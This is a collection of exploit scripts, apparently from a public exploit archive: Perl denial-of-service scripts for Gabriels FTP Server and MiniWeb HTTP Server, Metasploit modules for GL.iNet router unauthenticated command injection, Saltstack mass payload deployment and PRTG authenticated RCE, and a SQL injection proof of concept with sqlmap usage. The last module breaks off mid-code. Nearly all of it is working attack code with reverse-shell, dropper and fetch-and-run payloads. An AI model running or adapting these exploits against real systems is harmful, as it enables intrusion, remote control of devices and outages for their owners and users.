<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: Gabriels FTP Server 1.2 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 25 january 2024<br /># Vendor Homepage: N/A<br /># Download to demo: https://drive.google.com/file/d/1k8QxfP6x908E-1QpRAVulKoAM9OEo1a8/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: Gabriels FTP Server 1.2<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=wwHuXfYS8yQ<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.<br />#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $payload = "\x41\x2C\x41\x20\x42"x500;<br /><br /> my $ftp_socket = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp',<br /> Timeout => '10',<br /> ) or die "Não foi possível se conectar ao servidor.";<br /><br /><br /> my $response = <$ftp_socket>;<br /><br /> print $ftp_socket "USER $payload\r\n";<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "######################################################################\n";<br /> print "# Gabriels FTP Server 1.2 - Denied of Service #\n";<br /> print "# #\n";<br /> print "# Coded by Fernando Mengali #\n";<br /> print "# #\n";<br /> print "# e-mail: fernando.mengalli\@gmail.com #\n";<br /> print "# #\n";<br /> print "######################################################################\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'digest/md5'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'GL.iNet Unauthenticated Remote Command Execution via the logread module.',<br /> 'Description' => %q{<br /> A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker<br /> to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`<br /> interface in the `logread` module.<br /> This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen<br /> by the attacker.<br /> However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication<br /> through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be<br /> retrieved without knowing a valid username and password.<br /><br /> The following GL.iNet network products are vulnerable:<br /> - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;<br /> - MT6000: v4.5.0 - v4.5.3;<br /> - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;<br /> - E750/E750V2, MV1000: v4.3.8;<br /> - X3000: v4.0.0 - v4.4.2;<br /> - XE3000: v4.0.0 - v4.4.3;<br /> - SFT1200: v4.3.6;<br /> - and potentially others (just try ;-)<br /><br /> NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads<br /> when using the Linux Dropper target.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor<br /> 'Unknown', # Discovery of the vulnerability CVE-2023-50445<br /> 'DZONERZY' # Discovery of the vulnerability CVE-2023-50919<br /><br /> ],<br /> 'References' => [<br /> ['CVE', '2023-50445'],<br /> ['CVE', '2023-50919'],<br /> ['URL', 'https://attackerkb.com/topics/3LmJ0d7rzC/cve-2023-50445'],<br /> ['URL', 'https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919'],<br /> ['URL', 'https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html'],<br /> ['URL', 'https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md']<br /> ],<br /> 'DisclosureDate' => '2023-12-10',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_netcat'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],<br /> 'Linemax' => 900,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('SID', [false, 'Session ID'])<br /> ])<br /> end<br /><br /> def vuln_version?<br /> @glinet = { 'model' => nil, 'firmware' => nil, 'arch' => nil }<br /> # check first with version 4.x api call<br /> post_data = {<br /> jsonrpc: '2.0',<br /> id: rand(1000..9999),<br /> method: 'call',<br /> params: [<br /> '',<br /> 'ui',<br /> 'check_initialized',<br /> {}<br /> ]<br /> }.to_json<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'ctype' => 'text/json',<br /> 'uri' => normalize_uri(target_uri.path, 'rpc'),<br /> 'data' => post_data.to_s<br /> })<br /> if res && res.code == 200 && res.body.include?('result')<br /> res_json = res.get_json_document<br /> unless res_json.blank?<br /> @glinet['model'] = res_json['result']['model']<br /> @glinet['firmware'] = res_json['result']['firmware_version']<br /> end<br /> else<br /> # check with version 3.x api call. These versions are NOT vulnerable<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'hello')<br /> })<br /> if res && res.code == 200 && res.body.include?('model') && res.body.include?('version')<br /> res_json = res.get_json_document<br /> unless res_json.blank?<br /> @glinet['model'] = res_json['model']<br /> @glinet['firmware'] = res_json['version']<br /> end<br /> end<br /> end<br /><br /> # check for the vulnerable models and firmware versions<br /> case @glinet['model']<br /> when 'sft1200'<br /> @glinet['arch'] = 'mipsle'<br /> return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.6')<br /> when 'ar750', 'ar750s', 'ar300m', 'ar300m16'<br /> @glinet['arch'] = 'mipsbe'<br /> return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')<br /> when 'mt300n-v2', 'mt1300'<br /> @glinet['arch'] = 'mipsle'<br /> return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')<br /> when 'ap1300', 'b1300'<br /> @glinet['arch'] = 'armle'<br /> return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')<br /> when 'e750', 'e750v2'<br /> @glinet['arch'] = 'mipsbe'<br /> return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')<br /> when 'mv1000'<br /> @glinet['arch'] = 'armle'<br /> return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')<br /> when 'ax1800', 'axt1800', 'a1300'<br /> @glinet['arch'] = 'armle'<br /> return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')<br /> when 'mt2500', 'mt2500a', 'mt3000'<br /> @glinet['arch'] = 'aarch64'<br /> return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')<br /> when 'mt6000'<br /> @glinet['arch'] = 'aarch64'<br /> return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.5.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.5.3')<br /> when 'x3000'<br /> @glinet['arch'] = 'aarch64'<br /> return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.2')<br /> when 'xe3000'<br /> @glinet['arch'] = 'aarch64'<br /> return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.3')<br /> end<br /> @glinet['arch'] = 'n/a'<br /> return false<br /> end<br /><br /> def auth_bypass<br /> # Check if datastore['SID'] is set<br /> return datastore['SID'] unless datastore['SID'].blank?<br /><br /> # Exploit CVE-2023-50919 to retrieve the SID without valid username and password.<br /> # Send an RPC request calling the challenge method, which will return a random nonce,<br /> # the selected root user’s salt, and the crypt’s algorithm to hash the password.<br /> post_data = {<br /> jsonrpc: '2.0',<br /> id: rand(1000..9999),<br /> method: 'challenge',<br /> params: {<br /> username: 'root'<br /> }<br /> }.to_json<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'ctype' => 'text/json',<br /> 'uri' => normalize_uri(target_uri.path, 'rpc'),<br /> 'data' => post_data.to_s<br /> })<br /> if res && res.code == 200 && res.body.include?('nonce')<br /> res_json = res.get_json_document<br /> unless res_json.blank?<br /> nonce = res_json['result']['nonce']<br /> end<br /> else<br /> fail_with(Failure::NotFound, 'Getting the random nonce failed.')<br /> end<br /> # Perform REGEX to lookup uid field from /etc/shadow to be used as password with manipulated root username<br /> # Use the SQL injection part to lookup the ACLs for root stored in sqlite db<br /> # Create the password hash which is the md5 of the concatenation of the user, password, and the retrieved nonce<br /> username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"<br /> pw = '0'<br /> hash = Digest::MD5.hexdigest("#{username}:#{pw}:#{nonce}")<br /><br /> # Login with the password hash and obtain the SessionID (SID)<br /> post_data = {<br /> jsonrpc: '2.0',<br /> id: rand(1000..9999),<br /> method: 'login',<br /> params: {<br /> username: username.to_s,<br /> hash: hash.to_s<br /> }<br /> }.to_json<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'ctype' => 'text/json',<br /> 'uri' => normalize_uri(target_uri.path, 'rpc'),<br /> 'data' => post_data.to_s<br /> })<br /> if res && res.code == 200 && res.body.include?('sid')<br /> res_json = res.get_json_document<br /> unless res_json.blank?<br /> sid = res_json['result']['sid']<br /> end<br /> else<br /> fail_with(Failure::NotFound, 'Retrieving the SessionID (SID) failed.')<br /> end<br /> return sid<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> payload = Base64.strict_encode64(cmd)<br /> cmd = "echo #{payload}|openssl enc -base64 -d -A|sh"<br /> post_data = {<br /> jsonrpc: '2.0',<br /> id: rand(1000..9999),<br /> method: 'call',<br /> params: [<br /> @sid.to_s,<br /> 'logread',<br /> 'get_system_log',<br /> {<br /> lines: '',<br /> module: "|#{cmd}"<br /> }<br /> ]<br /> }.to_json<br /><br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'ctype' => 'text/json',<br /> 'cookie' => "Admin-Token=#{@sid}",<br /> 'uri' => normalize_uri(target_uri.path, 'rpc'),<br /> 'data' => post_data.to_s<br /> })<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} can be exploited.")<br /> # Check if target is a GL.iNet network device and the firmware version is vulnerable<br /> return CheckCode::Vulnerable("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if vuln_version?<br /><br /> unless @glinet['firmware'].nil?<br /> # GL.iNet network devices with firmware version 3.x that are safe from this exploit<br /> return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.0.0')<br /><br /> # GL.iNet network devices with a firmware version 4.x or higher which still could be vulnerable unless the architecture is not available (n/a)<br /> if @glinet['arch'] != 'n/a' && (Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0'))<br /> return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}")<br /> end<br /> return CheckCode::Detected("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0')<br /> end<br /> # No GL.iNet network device or not reachable<br /> CheckCode::Unknown('No GL.iNet network device or device is not responding.')<br /> end<br /><br /> def exploit<br /> @sid = auth_bypass<br /> print_status("SID: #{@sid}")<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> # Don't check the response here since the server won't respond<br /> # if the payload is successfully executed.<br /> execute_cmdstager({ linemax: target.opts['Linemax'] })<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = GoodRanking<br /><br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::Local::Saltstack<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Saltstack Minion Payload Deployer',<br /> 'Description' => %q{<br /> This exploit module uses saltstack salt to deploy a payload and run it<br /> on all targets which have been selected (default all).<br /> Currently only works against nix targets.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'c2Vlcgo'<br /> ],<br /> 'Platform' => [ 'linux', 'unix' ],<br /> 'Stance' => Msf::Exploit::Stance::Passive,<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Targets' => [[ 'Auto', {} ]],<br /> 'Privileged' => true,<br /> 'References' => [],<br /> 'DisclosureDate' => '2011-03-19', # saltstack salt original release date<br /> 'DefaultTarget' => 0,<br /> 'Passive' => true, # this allows us to get multiple shells calling home<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options [<br /> OptString.new('SALT', [true, 'salt-master executable location', '']),<br /> OptString.new('MINIONS', [true, 'Minions Target', '*']),<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),<br /> OptString.new('TargetWritableDir', [ true, 'A directory where we can write and execute files on targets', '/tmp' ]),<br /> OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]),<br /> OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions', 60 ]),<br /> OptInt.new('TIMEOUT', [true, 'Timeout for salt commands to run in seconds', 120])<br /> ]<br /> end<br /><br /> def salt_master<br /> return @salt if @salt<br /><br /> [datastore['SALT'], '/usr/bin/salt-master', '/usr/local/bin/salt-master'].each do |exec|<br /> next unless executable?(exec)<br /><br /> @salt = exec<br /> return @salt<br /> end<br /> @salt<br /> end<br /><br /> def list_minions_printer<br /> minions = list_minions<br /> return if minions.nil?<br /><br /> tbl = Rex::Text::Table.new(<br /> 'Header' => 'Minions List',<br /> 'Indent' => 1,<br /> 'Columns' => ['Status', 'Minion Name']<br /> )<br /><br /> count = 0<br /> minions['minions'].each do |minion|<br /> tbl << ['Accepted', minion]<br /> count += 1<br /> end<br /><br /> print_good(tbl.to_s)<br /><br /> # https://github.com/rapid7/metasploit-framework/pull/18626#discussion_r1434577017<br /> print_good("#{count} minions were found in the accepted state, and will attempt to execute payload. If this isn't an expected volume (too many), ctr+c to halt execution. Pausing 10 seconds.")<br /> Rex.sleep(10)<br /> count<br /> end<br /><br /> def check<br /> return CheckCode::Safe('salt-master does not seem to be installed, unable to find salt-master executable') if salt_master.nil?<br /><br /> CheckCode::Vulnerable('salt-master executable found')<br /> end<br /><br /> def exploit<br /> # Make sure we can write our exploit and payload to the local system<br /> fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir']<br /> count = 1 # default to running if we decide not to calculate<br /> count = list_minions_printer if datastore['CALCULATE']<br /> fail_with Failure::NotFound, 'No exploitable minions found.' if count == 0<br /><br /> payload_name = rand_text_alphanumeric(5..10)<br /><br /> # due to a bug in older (2021) versions of salt-cp, we need to write ascii files. https://github.com/saltstack/salt/issues/59899<br /> upload_and_chmodx "#{datastore['WritableDir']}/#{payload_name}", Rex::Text.encode_base64(generate_payload_exe)<br /><br /> print_status('Copying payload to minions')<br /> cmd_exec("salt-cp '#{datastore['MINIONS']}' '#{datastore['WritableDir']}/#{payload_name}' '#{datastore['TargetWritableDir']}/#{payload_name}.b64'")<br /> print_status('Executing payloads')<br /> cmd_exec("salt '#{datastore['MINIONS']}' cmd.run 'base64 -d #{datastore['TargetWritableDir']}/#{payload_name}.b64 > #{datastore['TargetWritableDir']}/#{payload_name} && chmod 755 #{datastore['TargetWritableDir']}/#{payload_name} && #{datastore['TargetWritableDir']}/#{payload_name}'")<br /><br /> # stolen from exploit/multi/handler<br /> stime = Time.now.to_f<br /> timeout = datastore['ListenerTimeout'].to_i<br /> loop do<br /> break if timeout > 0 && (stime + timeout < Time.now.to_f)<br /><br /> Rex::ThreadSafe.sleep(1)<br /> end<br /> end<br /><br /> def on_new_session(_session)<br /> super<br /> cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi')<br /><br /> begin<br /> print_warning("Deleting: #{datastore['TargetWritableDir']}/#{payload_name}")<br /> cli.fs.file.rm("#{datastore['TargetWritableDir']}/#{payload_name}")<br /> print_good("#{datastore['TargetWritableDir']}/#{payload_name} removed")<br /> rescue StandardError<br /> print_error("Unable to delete: #{datastore['TargetWritableDir']}/#{payload_name}")<br /> end<br /> end<br /><br />end<br /></code></pre>
<pre><code># Exploit Title: Employee Management System - SQLi<br /># Date: 23/03/2024<br /># Exploit Author: Özlem Balcı<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link:<br />https://www.sourcecodester.com/php/16999/employee-management-system.html<br /># Software Download:<br />https://www.sourcecodester.com/download-code?nid=16999&title=Employee+Management+System+using+PHP+and+MySQL<br /># Version: 1.0<br /># Tested on: Mac OS<br /><br />## Description<br />A Time-Based Blind SQL injection vulnerability in the login page<br />(/employee_akpoly/Account/login.php) in Employee Management System allows<br />remote unauthenticated attackers to execute remote command through<br />arbitrary SQL commands by "txtemail" parameter<br /><br />## Request PoC<br /><br />POST /employee_akpoly/Account/login.php HTTP/1.1<br />Host: localhost<br />Content-Length: 55<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "macOS"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/employee_akpoly/Account/login.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: PHPSESSID=1af7jipa5jq7ak8ifd09bgtokf<br />Connection: close<br /><br />txtemail=test%40test.com&txtpassword=12345A&E&btnlogin=<br /><br />This request causes an error. Adding ' AND (SELECT 2092 FROM<br />(SELECT(SLEEP(11)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE to the end<br />of "txtemail" parameter, the response to request was 302 status code with<br />message of Found, but 11 seconds later, which indicates that our sleep 11<br />command works.<br /><br />POST /employee_akpoly/Account/login.php HTTP/1.1<br />Host: localhost<br />Content-Length: 117<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "macOS"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/employee_akpoly/Account/login.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: PHPSESSID=1af7jipa5jq7ak8ifd09bgtokf<br />Connection: close<br /><br />txtemail=test@test.com' AND (SELECT 2092 FROM (SELECT(SLEEP(11)))DZSD) AND<br />'yLcd'='yLcd&txtpassword=123456AE&btnlogin<br /><br /><br />sqlmap -r emp.txt --risk=3 --level=3 --dbms=mysql --is-dba --users<br />--privileges --role<br /><br />Parameter: txtemail (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: txtemail=test@test.com' AND (SELECT 2092 FROM<br />(SELECT(SLEEP(5)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE&btnlogin=[image:<br />Employee Management System 1.png][image: Employee Management System2.png]<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket;<br /><br /># Exploit Title: MiniWeb HTTP Server 0.8.19 - Denied of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 24 january 2024<br /># Vendor Homepage: N/A<br /># Download to demo: https://drive.google.com/file/d/1935vpOZJPFJqnwTMPdkXTvoblA1SzBEK/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: MiniWeb HTTP Server 0.8.19 - Denied of Service (DoS)<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denied of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=2yVPUO-rl1E<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Backwards jump to code a known distance from the stack pointer.<br />#The web server does not correctly handle the amount of data or bytes sent to server.<br />#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $payload = "\x41" x 2038;<br /><br /> my $http_req = "POST /index.html HTTP/1.1\r\n";<br /> $http_req .= "Host: $ip\r\n";<br /> $http_req .= "From: header-data\r\n";<br /> $http_req .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";<br /> $http_req .= $payload;<br /><br />my $socket = IO::Socket::INET->new(<br /> PeerAddr => $host,<br /> PeerPort => $port,<br /> Proto => 'tcp'<br />) or die "[-] Could not connect\n";<br /><br />$socket->send($http_req);<br />$socket->close();<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print q {<br /><br /><br /> _/| <br /> // o\ <br /> || ._) <br /> //__\ <br /> )___( <br /><br /> [+] MiniWeb HTTP Server 0.8.19 - Denied of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>
<pre><code>class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Retry<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'PRTG CVE-2023-32781 Authenticated RCE',<br /> 'Description' => %q{<br /> Authenticated RCE in Paessler PRTG<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => ['Kevin Joensen <kevin[at]baldur.dk>'],<br /> 'References' => [<br /> [ 'URL', 'https://baldur.dk/blog/prtg-rce.html'],<br /> [ 'CVE', '2023-32781']<br /> ],<br /> 'DisclosureDate' => '2023-08-09',<br /> 'Platform' => 'win',<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'Targets' => [<br /> [<br /> 'Windows_Fetch',<br /> {<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },<br /> 'Type' => :win_fetch<br /> }<br /> ],<br /> [<br /> 'Windows_CMDStager',<br /> {<br /> 'Arch' => [ ARCH_X64, ARCH_X86 ],<br /> 'Platform' => 'win',<br /> 'Type' => :win_cmdstager,<br /> 'CmdStagerFlavor' => [ 'psh_invokewebrequest' ]<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /><br /> 'DefaultOptions' => {},<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new(<br /> 'USERNAME',<br /> [ true, 'The username to authenticate with', 'prtgadmin' ]<br /> ),<br /> OptString.new(<br /> 'PASSWORD',<br /> [ true, 'The password to authenticate with', 'prtgadmin' ]<br /> ),<br /> OptString.new(<br /> 'TARGETURI',<br /> [ true, 'The URI for the PRTG web interface', '/' ]<br /> )<br /> ]<br /> )<br /> end<br /><br /> def check<br /> begin<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(datastore['URI'], '/index.htm')<br /> })<br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError<br /> return CheckCode::Unknown<br /> ensure<br /> disconnect<br /> end<br /><br /> if res && res.code == 200<br /> prtg_server_header = res.headers['Server']<br /><br /> if (prtg_server_header.include? 'PRTG') || (html.to_s.include? 'PRTG')<br /> return CheckCode::Detected<br /> end<br /> end<br /><br /> return CheckCode::Unknown<br /> end<br /><br /> def exploit<br /> @sensors_to_delete = []<br /><br /> connect<br /> case target['Type']<br /> when :win_cmdstager<br /> execute_cmdstager<br /> when :win_fetch<br /> execute_command(payload.encoded)<br /> end<br /> end<br /><br /> def on_new_session(client)<br /> super<br /> @sensors_to_delete.each do |sensor_id|<br /> delete_sensor_by_id(sensor_id)<br /> end<br /> print_good('Session created')<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> print_status('Running PRTG RCE exploit')<br /> authenticate_prtg<br /> bat_file_name = write_bat_file_to_disk(cmd)<br /> run_bat_file_from_disk(bat_file_name)<br /> print_status('Exploit done')<br /> handler<br /> end<br /><br /> def authenticate_prtg<br /> print_status('Authenticating against PRTG')<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'public', 'checklogin.htm'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD']<br /> }<br /> })<br /> unless res<br /> fail_with(Failure::NoAccess, 'Failure to connect to PRTG')<br /> end<br /> if res && res.code == 302 && res.get_cookies<br /> 